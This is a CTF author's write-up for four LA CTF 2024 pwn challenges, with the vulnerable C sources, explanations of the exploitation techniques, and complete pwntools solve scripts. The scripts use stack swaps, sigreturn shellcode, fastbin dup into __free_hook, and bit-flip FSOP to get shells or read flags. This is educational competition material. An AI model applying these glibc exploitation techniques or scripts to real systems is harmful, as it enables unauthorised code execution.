Contents

LA CTF 2024 - Author Writeups

Writeups of the pwn challenges I authored for LA CTF 2024.

woogie-boogie

This challenge was inspired by pepsipu’s challenge boogie-woogie from DiceCTF 2024 qualifiers. In that challenge we are given byte-granular swaps, so the difficulty comes from leaking libc, but it got me wondering about how powerful 8-byte swaps would be.

source

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

long readint() {
	char buf[0x10];
	read(0, buf, sizeof(buf));
	long v = atol(buf);
	memset(buf, 0, sizeof(buf));
	return v;
}

void swap(long *a, long *b) {
	*a ^= *b;
	*b ^= *a;
	*a ^= *b;
}

int main() {
	setvbuf(stdout, 0, _IOLBF, 0);
	long v, o1, o2;
	for(;;) {
		write(1, "woogie: ", 8);
		o1 = readint();
		write(1, "boogie: ", 8);
		o2 = readint();
		if(!o1 && !o2)
			break;
		swap(&v+o1, &v+o2);
	}
	for(int i = 0; i < 4; i++) {
		char tmp = *(((char*)&v)+i);
		*(((char*)&v)+i) = *(((char*)&v)+7-i);
		*(((char*)&v)+7-i) = tmp;
	}
	fwrite(&v, 1, 8, stdout);
	fflush(stdout);
	write(1, "\n", 1);
	return 0;
}

overview

We are given unlimited 8-byte aligned swaps relative to the stack, and before exiting, the program will print a stack value, providing us with arbitrary stack read. We can trivially loop main by swapping our return address with _start, which will always be at a consistent offset, allowing for unlimited leaks.

To solve this challenge, we need to turn our swap primitive into a more controlled write. If we can control 8 bytes of data in memory, we have an arbitrary write by swapping with that location.

intended

The readint function zeroes out the stack buffer containing our input before returning, so we can’t control data that way, but our offset values will persist on the stack as locals in main. The caveat here is that any useful address + a stack address will result in some garbage, so our swap will segfault, and we can only bypass the swap if both offsets are zero. This prevents us from setting one of our offsets to a onegadget address for example. Despite this, our offsets can still be relatively large negative numbers, since the stack has capacity to expand, and this allows us to control the lower two bytes of a value in memory by swapping with our offsets.

The next step is sort of hinted at by the various contrived aspects of this challenge. Our program is unusually line buffered, our leak is written as big-endian bytes to stdout while other output just uses write, and there is an additional run wrapper used in the Docker, the source of which I’ll provide below.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void gen(char *s, int n) {
	const char charset[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
	for(int i = 0; i < n; i++)
		s[i] = charset[rand() % (sizeof(charset)-1)];
	s[n] = 0;
}

int main() {
	unsigned seed;
	int fd = open("/dev/urandom", O_RDONLY);
	if(fd < 0 || read(fd, &seed, sizeof(seed)) < 0) {
		perror("/dev/urandom");
		return 1;
	}
	close(fd);
	srand(seed);
	int N = rand()%50 + 50;
	char a1[101], a2[101];
	for(int i = 0; i < N; i++) {
		int l1 = rand()%100 + 1;
		int l2 = rand()%100 + 1;
		gen(a1, l1);
		gen(a2, l2);
		setenv(a1, a2, 1);
	}
	char *args[] = {"./woogie-boogie", 0};
	execvp(args[0], args);
	perror("execvp");
	return 1;
}
This wrapper sets randomly generated environment variables before spawning woogie-boogie. The idea here is to use misaligned stack addresses in envp combined with our stdout write to get partial overwrites, being able to control the low two bytes with our negative offsets. We must first dynamically search the envp for a two byte misaligned address, which is easy to do with our swaps and leaks. Then, we just need to overwrite the _IO_write_ptr field of stdout with a two byte misaligned stack address, and the value in memory at the next address over will get partially overwritten with the low two bytes of our controllable offset during the fwrite. The fflush immediately after will also reset any corruption. From here, we can form various useful gadgets by partially overwriting existing libc addresses. A onegadget was unfortunately not formable, so I used pop rdi and gets gadgets instead. This was the intended solution, and my solve script is shown below.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
#!/usr/bin/env python3

from pwn import *

exe = ELF("./woogie-boogie")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.31.so")

serv = "chall.lac.tf"
port = 31166

context.binary = exe

def conn():
    if args.REMOTE:
        r = remote(serv, port)
    else:
        r = process(["./run"])
        if args.GDB:
            gdb.attach(r, gdbscript="""
                b *$pie+0x13b0
            """)
    return r

r = conn()

rel = 0
INC = 0xe0

def swap(a1, a2):
    r.sendlineafter(b"woogie:", str(a1).encode())
    r.sendlineafter(b"boogie:", str(a2).encode())

def skip():
    global rel
    swap(0, 0)
    rel -= INC

def read(off):
    swap(5, 12)
    swap(0, off)
    if rel > 0:
        skip()
    else:
        swap(0, 0)
    l = r.recvline().strip()
    return u64(l, endian="big")

def math(addr):
    addr = ((addr & 0xff00) >> 8) | ((addr & 0xff) << 8)
    return -(2**16 - addr)

lastm = 0
misal = 0

def getmisal(stack, heap):
    global lastm, misal
    misal = 0
    envp = stack+0x3c8
    # search envp for two byte misalignment
    for i in range(lastm, lastm+0x20):
        log.info(str(i)) 
        a = read((envp+i*8-rel)//8)
        if a & 0xf == 0xa or a & 0xf == 2:
            misal = a
            break
    if misal == 0:
        print("no suitable misalignment in envp")
        exit()
    if i > lastm:
        lastm = i+1
    log.info(f"{hex(misal)=}") 
    # recover misalignment by double reversing
    swap(5, 12)
    swap((heap-rel)//8, 0)
    skip()
    swap(5, 12)
    swap((heap-rel)//8, (envp-rel)//8)
    skip()

def main():
    global rel, misal
    # get sufficient leaks
    stack = read(7)-0x3b8
    log.info(f"{hex(stack)=}")
    libc.address = read(12)-0x24083
    log.info(f"{hex(libc.address)=}")
    exe.address = read(9)-exe.sym.main
    log.info(f"{hex(exe.address)=}")
    rel = stack
    heap = read((libc.address+0x1ec2c8-rel)//8)+0x2a0
    log.info(f"{hex(heap)=}")

    envp = stack+0x3c8
    getmisal(stack, heap)
    # partially overwrite libc address by misaligning stdout,
    # we can control low two bytes with large negative offset
    stdout_writeptr = libc.sym._IO_2_1_stdout_+5*8
    swap(2, math(libc.sym.gets))
    swap(0, math(libc.sym.gets))
    swap((misal-2-rel+8)//8, (stack+0x268-rel)//8)
    swap((envp-rel)//8, (stdout_writeptr-rel)//8)
    swap(5, 12)
    skip()
    gets = misal-2+8
    log.info(f"{hex(gets)=}")

    getmisal(stack, heap)
    swap(2, math(libc.address+0x23b6a))
    swap(0, math(libc.address+0x23b6a))
    swap((misal-2-rel+8)//8, (libc.address+0x1ec058-rel)//8)
    swap((envp-rel)//8, (stdout_writeptr-rel)//8)
    swap(5, 12)
    skip()
    poprdi = misal-2+8
    log.info(f"{hex(poprdi)=}")

    swap(5, (poprdi-rel)//8)
    swap(6, (libc.address+0x1f2038-rel)//8)
    swap(7, (gets-rel)//8)
    swap(8, 12)
    skip()
    bss = libc.address+0x1f2488
    log.info(f"sending rop")
    r.sendline(p64(libc.address+0x23b6a) + p64(next(libc.search(b"/bin/sh\x00"))) + p64(libc.address+0x22679) + p64(libc.sym.system))
    swap(5, (bss-rel-0x20)//8)
    swap(6, (bss+8-rel-0x20)//8)
    swap(7, (bss+0x10-rel-0x20)//8)
    swap(8, (bss+0x18-rel-0x20)//8)
    skip()
    r.interactive()

if __name__ == "__main__":
    main()

unintended

My intended solution relies on the contrived file stream scenario with line buffering, so I was never really happy with it. There is a more elegant solution that works without any FSOP, found by J-jaeyoung, the first person to solve the challenge.

Their solution relies on the pointer mangling protection on libc exit functions.

1
2
#  define PTR_DEMANGLE(reg)	ror $2*LP_SIZE+1, reg;	\
		xor %fs:POINTER_GUARD, reg

This pointer demangling will ror the address by 17 and xor it with the key in TLS, which can be controlled with our swap. The goal is to get this to demangle to a onegadget. We can control the low 20 bits of the negative offset and set this to the key, which will look like this 0xfffffffffffxxxxx. We need to now control the exit pointer such that ror(p, 17) ends up as something like 0x7fxxxxxfffff where the xs must encode the onegadget. This is possible with a byte of bruteforce dependent on the onegadget address using our ability to swap endianness. You can find J-jaeyoung’s full solution here, huge congrats to them!

There are other solutions as well, such as getting libc’s read to return to main due to its call to __libc_enable_asynccancel, which ends up calling a mangled pointer that you can swap (credit to unvariant for finding this). This leaves a return address on the stack that allows you to control arguments to read. It’s even possible to corrupt the pointers during the swap, letting you edit values with the xor to form gadgets, shown in gfelber’s writeup.

yacc

This challenge was a bit contrived and misleading, but hopefully still fun. All of the source was provided, and it implements a mini compiler for a calculator language. Most of the parsing is irrelevant, however, and we only need to focus on gen.c responsible for emitting the output ELF, which will get execved before the end of the program. The gen.c code is shown below.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#include "calc.h"

#define MAXNUMS 32

char elfhdr[] = {127, 69, 76, 70, 2, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 62, 0, 1, 0, 0, 0, 120, 112, 51, 49, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 56, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 112, 51, 49, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 184, 60, 0, 0, 0};

char elfend[] = {15, 5};

int numcnt;

void startelf(void)
{
	fwrite(elfhdr, 1, sizeof(elfhdr), outfile);
}

void endelf()
{
	putcode(elfend, sizeof(elfend));
	fwrite(code.buf, 1, code.len, outfile);
}

void putcode(char *buf, int sz)
{
	if(code.len + sz >= CODESZ)
		yyerror("code is too long");
	for(int i = 0; i < sz; i++)
		code.buf[code.len++] = buf[i];
}

char cadd[] = {94, 95, 72, 1, 247, 87};
char csub[] = {94, 95, 72, 41, 247, 87};
char cdiv[] = {94, 95, 72, 137, 248, 72, 49, 210, 72, 247, 246, 72, 137, 199, 87};
char cmul[] = {94, 95, 72, 137, 248, 72, 247, 230, 72, 137, 199, 87};
char crem[] = {94, 95, 72, 137, 248, 72, 49, 210, 72, 247, 246, 72, 137, 215, 87};
char cnum[] = {72, 191, 0, 0, 0, 0, 0, 0, 0, 0, 87};

void emit(Node *n)
{
	switch(n->op) {
	case OADD:
		emit(n->l);
		emit(n->r);
		putcode(cadd, sizeof(cadd));
		break;
	case OSUB:
		emit(n->l);
		emit(n->r);
		putcode(csub, sizeof(csub));
		break;
	case ODIV:
		emit(n->l);
		emit(n->r);
		putcode(cdiv, sizeof(cdiv));
		break;
	case OMUL:
		emit(n->l);
		emit(n->r);
		putcode(cmul, sizeof(cmul));
		break;
	case OREM:
		emit(n->l);
		emit(n->r);
		putcode(crem, sizeof(crem));
		break;
	case ONUM:
		if(numcnt++ >= MAXNUMS)
			yyerror("too many numbers, i hate math");
		for(int i = 2; i < 10; i++)
			cnum[i] = (n->num >> (i-2)*8) & 0xff;
		putcode(cnum, sizeof(cnum));
		break;
	}
}

overview

Before execveing our program in main, a seccomp filter is applied allowing open, read, write, exit, and sigreturn, so our generated ELF must perform orw to get the flag. Reversing the generation code, we see that the ELF will always end in a lone syscall instruction. This works to exit most of the time, because rax is set to the proper code for exit at the beginning of the ELF. All of our arithmetic instructions are stack-based, but the use of division and multiplication instructions allows us to set rax. Besides this, the arithmetic doesn’t matter at all, and we only care about the movabsq which allows us to control 8 bytes in the ELF which will get pushed onto the stack.

solution

We can set rax such that the syscall at the end of the program calls sigreturn. We can return to a misaligned address in our program and start executing the 8 byte segments we control, 2 byte reljumping between them. Our program restricts us to 32 numbers, which is just enough for the 31 stack values for a sigreturn frame plus an additional value for the multiplication/division.

Our shellcode must use the write syscall to brute force the stack since we lose it from the sigreturn. Then we can just perform a normal orw and get the flag. My solve script is below.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
#!/usr/bin/env python3

from pwn import *

serv = "chall.lac.tf"
port = 31169

exe = ELF("./calc")
context.arch = "amd64"

def conn():
    if args.REMOTE:
        r = remote(serv, port)
    else:
        r = process([exe.path])
        if args.GDB:
            gdb.attach(r, gdbscript="""

            """)
    return r

pl = []
r = conn()

def chain(code, jmp=3):
    code = asm(code).ljust(6, b"\x90") + b"\xeb" + p8(jmp)
    if len(code) > 8:
        print("code in chain too long")
        exit(1)
    pl.append(u64(code))

def main():
    # we can call sigreturn because division sets rax,
    # but we lose stack which we need for orw.
    # we recover it using behavior of write syscall
    # to tell us whether an address is writeable,
    # brute forcing the possible stack address space.
    # the shellcode to do all of this must be golfed
    # to a single sigreturn frame, with rel jumps
    # chaining the 6 byte code blocks
    chain("mov eax, edx; mov edi, edx; syscall")
    chain("test rax, rax; jns $+30")
    chain("add rsi, r9; jmp $-25")
    chain("mov rsp, rsi; push 0")
    chain("push r8; push SYS_open; pop rax", jmp=14)
    chain("mov rdi, rsp; xor rsi, rsi")
    chain("push rsi; pop rdx; push rsp; pop rdi; syscall")
    chain("push rax; pop rdi; push r11; pop rdx")
    chain("xor eax, eax; push rsp; pop rsi; syscall")
    chain("push SYS_write; pop rax; push 1")
    chain("pop rdi; syscall")

    frame = SigreturnFrame()
    frame.rip = 0x313370ed
    frame.r8 = u64(b"flag.txt")
    frame.r9 = 0x10000
    frame.r10 = 0x69420
    frame.r11 = pl[10]
    frame.r12 = pl[9]
    frame.r13 = pl[8]
    frame.r14 = pl[7]
    frame.r15 = pl[6]
    frame.rdi = pl[5]
    frame.rsi = 0x7ff000000000
    frame.rbp = pl[4]
    frame.rbx = pl[3]
    frame.rdx = 1
    frame.rax = pl[2]
    frame.rcx = pl[1]
    frame.rsp = pl[0]
    inp = b""
    for v in reversed(frame.values()):
        if v == 0x69420:
            inp += b"15/1;"
        else:
            inp += f"{v};".encode()
    if args.REMOTE:
        r.recvline()
        sol = subprocess.run(r.recvline().decode(), shell=True, stdout=subprocess.PIPE, text=True)
        r.sendafter(b"solution:", sol.stdout.encode())
    r.send(inp)
    r.interactive()

if __name__ == "__main__":
    main()

ppplot

This challenge was structured as standard heapnotes.

source

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

#define N 64
#define M 128

typedef struct Poly Poly;
struct Poly {
	int degree;
	int *coeff;
};

char grid[N][N];
Poly *polys[M];

int readint() {
	char buf[0x10];
	read(0, buf, sizeof(buf));
	return atoi(buf);
}

int eval(Poly *p, int x) {
	int res = 0;
	for(int i = 0; i < p->degree; i++) {
		int tmp = 1;
		for(int j = 0; j < i; j++)
			tmp *= x;
		tmp *= p->coeff[i];
		res += tmp;
	}
	return res;
}

void plot(int erase) {
	printf("idx: ");
	int idx = readint();
	if(idx < 0 || idx >= M) {
		printf("index out of bounds\n");
		return;
	}
	Poly *p = polys[idx];
	for(int i = 0; i < N; i++) {
		int y = eval(p, i-N/2) + N/2;
		printf("(%d, %d)\n", i-N/2, y-N/2);
		if(y >= 0 && y < N)
			grid[y][i] = erase ? '.' : '@';
	}
}

void view() {
	for(int i = 0; i < N; i++) {
		for(int j = 0; j < N; j++)	
			printf("%c", grid[i][j]);
		printf("\n");
	}
}

void add() {
	Poly *p = malloc(sizeof(Poly));
	printf("enter degree: ");
	p->degree = readint();
	if(p->degree < 0 || p->degree > 10) {
		printf("degree out of bounds\n");
		free(p);
		return;
	}
	p->coeff = malloc(sizeof(int)*p->degree);
	for(int i = 0; i < p->degree; i++) {
		printf("enter coefficient %d: ", i);
		p->coeff[i] = readint();
	}
	for(int i = 0; i < M; i++)
		if(!polys[i]) {
			printf("added at idx: %d\n", i);
			polys[i] = p;
			return;
		}
	printf("no more space\n");
	free(p);
}

void delete() {
	printf("idx: ");
	int idx = readint();
	if(idx < 0 || idx >= M) {
		printf("index out of bounds\n");
		return;
	}
	free(polys[idx]);
}

int main() {
	setbuf(stdin, 0);
	setbuf(stdout, 0);
	memset(grid, '.', N*N);
	for(;;) {
		printf("pp: ");
		switch(readint()) {
		case 1:
			add();
			break;
		case 2:
			view();
			break;
		case 3:
			plot(0);
			break;
		case 4:
			plot(1);
			break;
		case 5:
			delete();
			break;
		case 6:
			memset(grid, '.', N*N);
			break;
		default:
			printf("invalid choice\n");
		case 7:
			return 0;
		}
	}
}

overview

delete and plot both perform bounds checks on the index supplied, but freed chunks are not removed or zeroed out from the global array, so we have double free and read-after-free vulnerabilities. There is an additional bug in this code, however, that actually makes the exploitation harder. When freeing a chunk, it only frees the chunk belonging to the wrapper structure, not the user-supplied array of coefficients. With double free we have the classic fastbin dup combined with tcache stashing to get arbitrary write, but we need leaks first.

solution

1
2
3
4
struct Poly {
	int degree;
	int *coeff;
};

The chunks that we can double free will have their coefficient array as their second 8 byte value. Thus, the read-after-free must operate on a chunk with a heap address in both fd and bk. Because we are limited to 0x20 size, this can be done by first filling up the tcache so the chunk gets sorted into the fastbin. The script to leak heap, as well as our helper functions, are shown below.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
def add(deg, coef):
    r.sendlineafter(b"pp:", b"1")
    r.sendlineafter(b"degree:", str(deg).encode()) 
    for i in coef:
        r.sendlineafter(b"enter coefficient", str(i).encode()) 
    r.recvuntil(b"idx: ")
    return int(r.recvline().strip())

def plot(idx):
    r.sendlineafter(b"pp:", b"3")
    r.sendlineafter(b"idx:", str(idx).encode())
    r.recvuntil(b"(1, ")
    return ctypes.c_uint32(int(r.recvuntil(b")", drop=True))).value

def free(idx):
    r.sendlineafter(b"pp:", b"5")
    r.sendlineafter(b"idx:", str(idx).encode())
    
def dup():
    tc = add(1, [0])
    for i in range(6):
        add(1, [0])
    sb = add(1, [0])
    add(1, [0])
    add(1, [0])
    for i in range(7):
        free(tc+i)
    free(sb)
    free(sb+1)
    free(sb)
    for i in range(3):
        add(1, [0])

def leak(n):
    base = add(1, [0])
    for i in range(9):
        add(1, [0])
    for i in range(10):
        free(base+i)
    for i in range(3):
        add(1, [0])
    add(1, [n])
    add(1, [0])
    add(1, [0])
    return plot(base+9)

Because the minimum chunksize is 0x20, we can allocate a coefficient array with only one integer element. This will overwrite the degree field in the chunk we are read-after-freeing, but keep the coefficient as the heap address. Thus, we can cause the degree to be larger than what would otherwise be valid, reading past the chunk and into another heap address. Then, we can plot that chunk and look at the coordinate where x=1, since it will simply be the sum of the number of 4 byte values past the heap address that our degree specifies. Because of this, we have to leak the heap in two 4 byte parts, subtracting the first part to calculate the second part.

1
2
3
    heaplo = leak(11)-22
    heaphi = leak(12)-heaplo-726
    heap = ((heaphi << 32) | heaplo)+0x184

Now that we have heap, we need to leak libc. Our allocations are too small to go into the unsorted bin, so we will need to overwrite the metadata of one of our chunks to have a larger size. Then, we can free it and there will be libc addresses in our heap. We use the fastbin dup to get overlapping chunks and forge a proper size that passes prev_size checks.

1
2
3
4
5
6
7
    dup() 
    add(2, [heap & 0xffffffff, heap >> 32])
    add(10, [0]*10)
    add(4, [0, 0, 0x461, 0])
    add(1, [0])
    add(10, [0x460, 0, 0x21, 0, 0, 0, 0, 0, 0x21, 0])
    free(22)

With our heap leak, we can also use fastbin dup to make our leaking slightly easier by directly overwriting the coefficient array address.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
    dup()
    add(2, [heap & 0xffffffff, heap >> 32])
    add(10, [0]*10)
    add(5, [0, 0, 0, 0, 10])
    libchi = plot(33)
    libchi -= 0x21 + heaphi
    log.info(f"{hex(libchi)=}")
    tc = add(1, [0])
    for i in range(7):
        add(1, [0])
    sb = add(1, [0])
    add(1, [0])
    add(1, [0])
    for i in range(8):
        free(tc+i)
    free(sb)
    free(sb+1)
    free(sb)
    for i in range(3):
        add(1, [0])
    add(2, [heap & 0xffffffff, heap >> 32])
    add(10, [0]*10)
    add(5, [0, 0, 0, 0, 11])
    libclo = plot(33)
    libclo -= 0x21 + heaphi + libchi
    log.info(f"{hex(libclo)=}")
    libc.address = ((libchi << 32) | libclo)-0x1ecbe0
    log.info(f"{hex(libc.address)=}")

From here, we simply use our arb write to overwrite freehook with system. The full solve script is shown below.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
#!/usr/bin/env python3

from pwn import *
import ctypes

exe = ELF("./ppplot")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

serv = "chall.lac.tf"
port = 31164

context.binary = exe

def conn():
    if args.REMOTE:
        r = remote(serv, port)
    else:
        r = process([exe.path])
        if args.GDB:
            gdb.attach(r, gdbscript="""
                b *$pie+0x1689
                b *$pie+0x1547
            """)
    return r

r = conn()

def add(deg, coef):
    r.sendlineafter(b"pp:", b"1")
    r.sendlineafter(b"degree:", str(deg).encode()) 
    for i in coef:
        r.sendlineafter(b"enter coefficient", str(i).encode()) 
    r.recvuntil(b"idx: ")
    return int(r.recvline().strip())

def plot(idx):
    r.sendlineafter(b"pp:", b"3")
    r.sendlineafter(b"idx:", str(idx).encode())
    r.recvuntil(b"(1, ")
    return ctypes.c_uint32(int(r.recvuntil(b")", drop=True))).value

def free(idx):
    r.sendlineafter(b"pp:", b"5")
    r.sendlineafter(b"idx:", str(idx).encode())

def leak(n):
    base = add(1, [0])
    for i in range(9):
        add(1, [0])
    for i in range(10):
        free(base+i)
    for i in range(3):
        add(1, [0])
    add(1, [n])
    add(1, [0])
    add(1, [0])
    return plot(base+9)

def dup():
    tc = add(1, [0])
    for i in range(6):
        add(1, [0])
    sb = add(1, [0])
    add(1, [0])
    add(1, [0])
    for i in range(7):
        free(tc+i)
    free(sb)
    free(sb+1)
    free(sb)
    for i in range(3):
        add(1, [0])

def main():
    heaplo = leak(11)-22
    heaphi = leak(12)-heaplo-726
    heap = ((heaphi << 32) | heaplo)+0x184
    log.info(f"{hex(heap)=}")
    dup() 
    add(2, [heap & 0xffffffff, heap >> 32])
    add(10, [0]*10)
    add(4, [0, 0, 0x461, 0])
    add(1, [0])
    add(10, [0x460, 0, 0x21, 0, 0, 0, 0, 0, 0x21, 0])
    free(22)
    heap += 0x180
    log.info(f"{hex(heap)=}")
    dup()
    add(2, [heap & 0xffffffff, heap >> 32])
    add(10, [0]*10)
    add(5, [0, 0, 0, 0, 10])
    libchi = plot(33)
    libchi -= 0x21 + heaphi
    log.info(f"{hex(libchi)=}")
    tc = add(1, [0])
    for i in range(7):
        add(1, [0])
    sb = add(1, [0])
    add(1, [0])
    add(1, [0])
    for i in range(8):
        free(tc+i)
    free(sb)
    free(sb+1)
    free(sb)
    for i in range(3):
        add(1, [0])
    add(2, [heap & 0xffffffff, heap >> 32])
    add(10, [0]*10)
    add(5, [0, 0, 0, 0, 11])
    libclo = plot(33)
    libclo -= 0x21 + heaphi + libchi
    log.info(f"{hex(libclo)=}")
    libc.address = ((libchi << 32) | libclo)-0x1ecbe0
    log.info(f"{hex(libc.address)=}")
    dup()
    add(2, [heap & 0xffffffff, heap >> 32])
    add(2, [u32(b"/bin"), u32(b"/sh\x00")])
    add(10, [0]*10)
    dup()
    add(2, [libc.sym.__free_hook & 0xffffffff, libc.sym.__free_hook >> 32])
    add(10, [0]*10)
    add(2, [libc.sym.system & 0xffffffff, libc.sym.system >> 32])
    free(90)
    r.interactive()

if __name__ == "__main__":
    main()

flipma

Flipma was a bit flip challenge. We are given a limited number of bit flips relative to libc.

source

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int flips = 4;

long readint() {
	char buf[0x10];
	read(0, buf, sizeof(buf));
	return atol(buf);
}

void flip() {
	write(1, "a: ", 3);
	long a = readint();
	write(1, "b: ", 3);
	long b = readint();
	if(b < 0 || b >= 8) {
		puts("we're flipping bits, not burgers");
		return;
	}
	char v = *(((char*)stdin)+a);
	v ^= 1 << b;
	*(((char*)stdin)+a) = v;
	flips--;
}

int main() {
	setbuf(stdin, 0);
	setbuf(stdout, 0);
	for(;;) {
		if(flips <= 0) {
			puts("no more flips");
			return 0;
		}
		flip();
	}
}

solution

The path to a solution, as with many other bit flip challenges, is to first get infinite bit flips for arbitrary write. The bit flip counter is stored in the base program’s bss, but PIE is enabled. Our goal should be to leak the base address before our 4th bit flip so that we can overwrite the counter. The flip being relative to stdin hints that we will need some form of leak-oriented FSOP.

The FSOP technique I used has already been described in detail here. Unbuffered file streams hold libc addresses to themselves in the buffer fields, but the file write function called from puts will treat the stream as buffered as long as there is a difference between _IO_write_base and _IO_write_ptr. This will cause the write function to print out memory from libc between those two addresses. For this to work, we also need to make sure the _IO_CURRENTLY_PUTTING flag is set, and I initially thought we needed to use a bit flip on this, but just initializing stdout with an additional puts before the flips also works.

We can scan for pointers to base in libc and flip our _IO_write_base and _IO_read_end such that they point to a location before where these pointers are.

After our flips to set up the FSOP, we can send an invalid bit index to trigger the puts and get both base and libc leak.

After we get base leak and infinite flips, we have arbitrary write and can gain code execution through a variety of methods. I decided to do some more FSOP to leak the stack and return to a onegadget. The full solve script is shown below.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#!/usr/bin/env python3

from pwn import *

exe = ELF("./flipma")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.31.so")

serv = "chall.lac.tf"
port = 31165

context.binary = exe

def conn():
    if args.REMOTE:
        r = remote(serv, port)
    else:
        r = process([exe.path])
        if args.GDB:
            gdb.attach(r, gdbscript="""
                b *$pie+0x1351
            """)
    return r

r = conn()

def flip(a, b):
    r.sendlineafter(b"a:", str(a).encode())
    r.sendlineafter(b"b:", str(b).encode())

def absflip(a, b):
    flip(a-libc.sym._IO_2_1_stdin_, b)

def leak():
    r.sendlineafter(b"a:", b"69")
    r.sendlineafter(b"b:", b"69")

def write(a, old, new):
    for i in range(8):
        for j in range(8):
            if (old >> (i*8+j)) & 1 != (new >> (i*8+j)) & 1:
                absflip(a+i, j)

def main():
    # leak base with fsop
    flags = 0xd20
    read_end = flags+0x10
    write_base = flags+0x20
    leak()
    flip(write_base+1, 5) 
    flip(read_end+1, 5)
    leak()
    l = r.recvuntil(b"we're")
    exe.address = u64(l[0x89e:0x89e+8])-0x4030
    libc.address = u64(l[0x8e6:0x8e6+8])-0x1f2000
    log.info(f"{hex(exe.address)=}")
    log.info(f"{hex(libc.address)=}")
    # now have infinite flips
    absflip(exe.address+0x4010+2, 0)
    # leak stack with fsop
    write(libc.sym._IO_2_1_stdout_+8*2, libc.address+0x1ed723, libc.sym.environ-8)
    write(libc.sym._IO_2_1_stdout_+8*4, libc.address+0x1ed723, libc.sym.environ-8)
    write(libc.sym._IO_2_1_stdout_+8*5, libc.address+0x1ed723, libc.sym.environ+8)
    leak()
    l = r.recvuntil(b"we're")
    stack = u64(l[9:17])-0x100
    log.info(f"{hex(stack)=}")
    write(stack, libc.address+0x24083, libc.address+0xe3b01)
